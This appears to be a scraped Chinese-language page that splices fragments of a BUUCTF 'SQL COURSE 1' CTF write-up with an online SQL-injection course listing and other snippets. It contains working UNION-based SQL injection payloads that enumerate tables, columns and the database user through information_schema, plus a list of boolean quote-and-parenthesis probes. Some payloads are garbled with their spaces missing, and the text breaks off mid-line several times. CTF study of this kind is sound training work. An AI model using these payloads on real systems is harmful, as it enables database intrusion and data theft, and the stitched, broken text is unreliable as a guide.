BUUCTF_BUU SQL COURSE 1 打开实例 发现“热点”及“登录”两个选项 根据题目提示,sql注入,尝试在登录界面寻找注入点,无果 接着进入热点界面,发现三篇新闻,依次点击发现url变化,burp抓包 发现是通过对id值的控制访问不同界面,由此发现注入点 1.判断注入类型,输入1,2
id=0unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()# 1、判断是否存在注入、注入是字符型还是数字型 id=1 order by 1# id=1' order by 1# 数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致) id=1 order by 2# ...
44.Burpsuite intruder模块的使用-Web安全之SQL注入 时长:21分39秒 45.暴力破解CTF例题-Web安全之SQL注入 时长:12分29秒 46.防范暴力破解-Web安全之SQL注入 时长:06分54秒学员互动 100%作业点评课后上传的作业,学习过程中有困难疑惑都可进行提问 您需要学习后才可以评价, 立即学习 全部互动一课一练课程提问...
id=-1 union select user(),2得到用户root@localhost //group_get()函数用于回显所有数据 开始sql注入爆破表名?id= -1 union select 1, group_concat(table_name) from information_schema.tables where table_schema = 'news'得到表名admin,contens 爆破列名?id= -1 union select 1, group_concat(column_n...
1" and "0 1) and (1 1) and (0 1)) and ((1 1)) and ((0 1') and ('1 1') and ('0 1") and ("1 1") and ("0 1'" and "'1 1'" and "'0 后来才知道原来注入点被隐藏了,通过F12的net可以看到注入点在content_detail.php里面 ...